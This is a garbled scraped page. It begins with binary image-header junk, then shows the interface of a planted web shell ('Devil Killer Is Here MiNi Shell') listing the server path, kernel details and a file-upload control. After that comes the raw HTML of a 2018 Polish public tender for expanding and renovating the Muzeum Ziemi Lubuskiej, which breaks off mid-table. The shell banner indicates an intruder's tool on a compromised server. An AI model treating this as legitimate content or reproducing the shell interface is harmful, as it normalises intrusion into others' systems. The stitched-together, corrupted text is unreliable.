JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20180712/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20180712/572786-N-2018.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 572786-N-2018 z dnia 2018-07-12 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Muzeum Ziemi Lubuskiej w Zielonej Górze</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Rozbudowa i modernizacja Muzeum Ziemi Lubuskiej</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Roboty budowlane</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Tak</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu">Projekt "Rozbudowa i modernizacja Muzeum Ziemi Lubuskiej" w ramach działania 8.1 Ochrona dziedzictwa kulturowego i rozwój zasobów kultury oś priorytetowa VIII Ochrona dziedzictwa kulturowego i rozwój zasobów kultury Programu Operacyjnego Infrastruktura i Środowisko 2014 - 2020.</span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Muzeum Ziemi Lubuskiej w Zielonej Górze</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">27634000000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">al. Niepodległości</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">15</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">65048 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Zielona Góra</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">lubuskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">0-68 327 23 45</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">muzeum@man.zgora.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">0-68 324 65 61</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">administracyjny@mzl.zgora.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Inny (proszę określić):</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny">Jednostki organizacyjne administracji samorządowej</span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia"></span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">http://muzeumziemilubuskiej.bip.gov.pl/search/publiccontracts/</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Pocztą, osobiście, kurierem</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">ul. Grudzieniec 64, 60-601 Poznań (siedziba Wielkopolskiej Grupy Prawniczej)</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Rozbudowa i modernizacja Muzeum Ziemi Lubuskiej</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">AG.2221.2.26.2018</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Roboty budowlane</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">W zakresie zadania nr 1:Przedmiotem inwestycji jest rozbudowa budynku Muzeum Ziemi Lubuskiej w Zielonej Górze wraz z zagospodarowaniem terenu. Zakres robót obejmuje:1.1	Roboty rozbiórkowe 1.1.1	Rozbiórka budynku garażowego wraz z przybudówką 1.1.2	Rozbiórka nawierzchni drogowych i chodników 1.1.3	Wycinka drzew + mechaniczne karczowanie pni 1.1.4	Rozbiórka obróbek blacharskich 1.1.5	Rozbiórka stolarki okiennej i drzwiowej 1.1.6	Rozbiórka posadzek 1.1.7	Utylizacja gruzu i materiałów z rozbiórki1.2	Roboty ziemne 1.2.1	Wykonanie wykopu pod fundamenty1.3	Stan zerowy1.3.1	Podkład betonowy gr. 10cm 1.3.2	Izolacja płyt betonowych matą 1.3.3	Wykonanie płyt fundamentowych żelbetowych1.3.4	Wykonanie izolacji pionowej zewn. ścian fundamentowych matą1.3.5	Wykonanie ścian żelbetowych grubości 25cm1.3.6	Wykonanie ścian żelbetowych grubości 20cm1.3.7	Wykonanie ścian oporowych 1.3.8	Wykonanie słupów żelbetowych1.3.9	Nadproża, podciągi żelbetowe1.3.10	Schody żelbetowe 1.3.11	Strop żelbetowy Filigran1.3.12	Izolacja pionowa i pozioma ścian żelbetowych1.4	Ściany murowane1.4.1	Ściany parter1.4.2	Ściany I piętro1.4.3	Ściany II piętro1.4.4	Kanały wentylacyjne1.5	Konstrukcje żelbetowe1.5.1	Ściany i słupy żelbetowe parter1.5.2	Ściany i słupy żelbetowe I piętro1.5.3	Ściany i słupy żelbetowe II piętro1.5.4	Nadproża, podciągi, wylewki żelbetowe1.5.5	Schody żelbetowe1.5.6	Strop żelbetowy Filigran1.5.7	Strop z płyt kanałowych1.5.8	Szyb windowy1.5.9	Wieńce wraz ze zbrojeniem1.6	Dach1.6.1	Paroizolacja z folii 1.6.2	Izolacja pozioma z płyt z wełny mineralnej1.6.3	Pokrycie dachu 2x papą termozgrzewalną1.6.4	Świetlik dachowy, wyłaz kominowy1.6.5	Obróbki blacharskie 1.6.6	Rynny i rury spustowe1.7	Okładziny wewnętrzne 1.7.1	Tynki gipsowe piwnica 1.7.2	Tynki gipsowe i akustyczne parter 1.7.3	Tynki gipsowe i akustyczne I piętro 1.7.4	Tynki gipsowe i akustyczne II piętro 1.7.5	Tynki akustyczne sufitów 1.7.6	Listwy dylatacyjne 1.7.7	Ścianki z płyt GK (konstrukcja, wypełnienie z wełny min., obustronnie 2x płyta GK) - piwnica 1.7.8	Ścianki z płyt GK (konstrukcja, wypełnienie z wełny min., obustronnie 2x płyta GK) - parter 1.7.9	Ścianki z płyt GK (konstrukcja, wypełnienie z wełny min., obustronnie 2x płyta GK) - I p. 1.7.10	Sufity podwieszane 1.7.11	Malowanie ścian piwnica 1.7.12	Malowanie ścian parter 1.7.13	Malowanie ścian I piętro 1.7.14	Malowanie ścian II piętro 1.7.15	Płytki ścienne piwnica 1.7.16	Płytki ścienne parter 1.7.17	Płytki ścienne I piętro 1.7.18	Płytki ścienne II piętro1.8	Podłoża i posadzki 1.8.1	Izolacja pozioma podposadzkowa z płyt styropianowych 1.8.2	Warstwa wyrównawcza betonowa ze zbrojeniem 1.8.3	Posadzka z wykładziny podłogowej 1.8.4	Posadzka z wykładziny dywanowej 1.8.5	Listwy przyścienne 1.8.6	Posadzki z płytek Gres piwnica 1.8.7	posadzki z płytek Gres parter 1.8.8	posadzki z płytek gres I piętro 1.8.9	Posadzki z płytek gres II piętro 1.8.10	Stopnice i podstopnice z granitu polerowanego 1.8.11	Posadzki z granitu polerowanego piwnica 1.8.12	Posadzki z granitu polerowanego parter 1.8.13	Posadzki z granitu polerowanego I piętro 1.8.14	Posadzki z granitu polerowanego II piętro 1.8.15	Wykonanie sceny (konstrukcja drewniana -podłoga podniesiona, schody) 1.8.16	Wykonanie sceny - ułożenie parkietu 1.8.17	Posadzki epoksydowe - piwnica 1.8.18	Wycieraczka szczotkowa aluminiowa1.9	Stolarka okienna i drzwiowa 1.9.1	Poziom: Piwnica 1.9.1.1	Okna 1.9.1.2	Drzwi wewnętrzne 1.9.2	Ścianki systemowe w pom. sanitarnych 1.9.3	Poziom Parter 1.9.3.1	Okna 1.9.3.2	Drzwi wewnętrzne 1.9.4	Poziom I piętro 1.9.4.1	Okna 1.9.4.2	Drzwi wewnętrzne 1.9.5	Poziom II piętro 1.9.5.1	Okna 1.9.5.2	Drzwi wewnętrzne 1.9.5.3	Drzwi zewnętrzne aluminowe 1.9.6	Brama wjazdowa garażowa 1.9.7	Brama wewnętrzna pożarowa 1.10	Elementy ślusarskie 1.10.1	Balustrady wewnętrzne 1.10.2	Balustrady zewnętrzne 1.10.3	Drabiny 1.10.4	Wycieraczki stalowe 1.11	Elewacja 1.11.1	Elewacja z okładziny kamiennej 1.11.2	Ocieplenie ścian 1.11.3	Wyprawa elewacyjna z tynku akrylowego 1.11.4	Daszek 1.11.5	Napis z liter z tworzywa sztucznego 1.11.6	Żaluzje zewnętrzne 1.11.7	Malowanie farbą murów oporowych 1.11.8	Wykonanie opaski ze żwiru płukanego wokół budynku wraz z montażem obrzeży betonowych 1.12	Wyposażenie 1.12.1	Wyposażenie łazienek 1.12.2	Gaśnice 1.12.3	Krzesła w Sali konferencyjnej 1.12.4	Kurtyna sceniczna 1.12.5	Projektor multimedialny 1.12.6	Osłony na okna w salach wystawowych 1.13	Dźwig 1.14	Roboty budowlane w bud. istniejącym 1.14.1	Wykucie otworów drzwiowych 1.14.2	Montaż belek stalowych 1.14.3	Zamurowanie i tynkowanie bruzd 1.15	Przyłącza 1.15.1	Przyłącze energetyczne z trafostacją 1.15.2	Przyłącze do węzła cieplnego 1.16	Instalacje sanitarne 1.16.1	Instalacja wentylacji i klimatyzacji 1.16.1.1	Wentylacja 1.16.1.2	Klimatyzacja 1.16.2	Instalacje centralnego ogrzewania 1.16.2.1	Instalacje centralnego ogrzewania grzejnikowe 1.16.2.2	Instalacja zasilania nagrzewnic 1.16.3	Instalacje wodno-kanalizacyjne 1.16.3.1	Instalacje wodociągowe 1.16.3.2	Instalacje kanalizacyjne 1.16.3.3	Instalacje wody p.poż. 1.16.3.4	Odwodnienia zewnętrzne (garaż, dach, drenaż) 1.17	Instalacje elektryczne i teletechniczne 1.17.1	Rozdzielnie elektryczne i WLZ 1.17.2	Instalacje oświetleniowe+system sterowania 1.17.3	Instalacje gniazd wtykowych 1.17.4	Instalacje SAP 1.17.5	System oddymiania klatki schodowej 1.17.6	Instalacje nagłośnienia 1.17.7	Instalacje teleinformatyczne 1.17.8	Instalacje CCTV 1.17.9	Instaklacje przyzywowe dla osób niepełnosprawnych 1.17.10	Instalacje SWiN 1.17.11	Instalacje odgromowe i uziemiająca 1.17.12	Sieci i oświetlenie zewnętrzne 1.17.13	Pomiary elektryczne 1.18	Zagospodarowanie terenu 1.18.1	Droga manewrowa, chodniki, st.postojowe 1.18.2	Tereny zielone 1.18.3	Mała architekturaZamawiający ustala gwarancję jakości wszystkich prac na 36 miesięcy.Zamawiający ustala podstawowy wymiar gwarancji jakości wykonania pokrycia dachowego i konstrukcji dachu na 36 miesięcy.Szczegółowy zakres przedmiotu zamówienia określony został w Projekcie budowlanym, Projekcie wykonawczym, Specyfikacji Technicznej Wykonania i Odbioru Robót, Decyzji Miejskiego Konserwatora Zabytków z dnia 13 marca 2017 roku stanowiących załączniki do SIWZ.W zakresie zadania nr 2:Przedmiotem zamówienia jest remont istniejącego budynku Muzeum Ziemi Lubuskiej w Zielonej Górze:Zakres robót obejmuje:2.1	Roboty rozbiórkowe 2.2	Izolacja ścian piwnic 2.3	Uzupełnienie scian z cegły 2.4	Obudowy ogniowe belek stalowych dachu 2.5	Roboty wykończeniowe 2.5.1	Ścianki z płyt GK 2.5.2	Płytki ceramiczne ścienne 2.5.3	Malowanie ścian (wraz z przygotowaniem podłoża) 2.5.4	Gładź gipsowa 2.5.4.1	Gładź gipsowa na sufitach - piwnica 2.5.4.2	Gładź gipsowa na sufitach - parter 2.5.4.3	Gładź gipsowa na sufitach - I piętro 2.5.4.4	Gładź gipsowa na sufitach - II piętro 2.5.4.5	Gładź gipsowa na ścianach - piwnica 2.5.4.6	Gładź gipsowa na ścianach - parter 2.5.4.7	Gładź gipsowa na ścianach - I piętro 2.5.4.8	Gładź gipsowa na ścianach - II piętro 2.6	Warstwy wyrównujące pod wykonanie posadzki z wykładziny dywanowej 2.7	Wyłożenie wykładziny dywanowej 2.8	Posadzki z płytek Gres 2.9	Posadzki z granitu polerowanego 2.10	Stolarka drzwiowa 2.10.1	Stolarka drzwiowa wewnętrzna PCV 2.10.2	Stolarka drzwiowa wewnętrzna drewniana 2.10.3	Stolarka drzwiowa wewnętrzna metalowa w okleinie 2.11	Instalacja wod-kan remontowanej łazienki 2.11.1	Instalacja wodno-kanalizacyjna 2.11.2	Biały montaż 2.12	Instalacja centralnego ogrzewania 2.12.1	Roboty budowlane (wykucia, zamurowanie otworów, wywóz gruzu) 2.12.2	Demontaż grzejników i starej instalacji 2.12.3	Wykonanie nowej instalacji c.o. 2.12.4	Montaż grzejników, próby szczelności 2.13	Instalacje elektryczne i teletechniczne 2.13.1	Instalacje elektr. w Sali belkowej 2.13.2	Instalacje SAP 2.13.3	Instalacje CCTV 2.13.4	Instalacje przyzywowe w toaletach dla niepełnosprawnych 2.13.5	Instalacje SWiNZamawiający ustala podstawowy wymiar gwarancji jakości na 36 miesięcy.Szczegółowy zakres przedmiotu zamówienia określony został w Projekcie budowlanym, Specyfikacji Technicznej Wykonania i Odbioru Robót, Decyzji Miejskiego Konserwatora Zabytków z dnia 30 marca 2017 stanowiących załączniki do SIWZ.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">45212313-3</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45111000-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45223500-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45262500-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45261210-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45421000-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45430000-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45440000-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233120-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45342000-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45112710-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45331210-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45332000-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45331100-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45111300-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45112000-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45262500-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45320000-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: 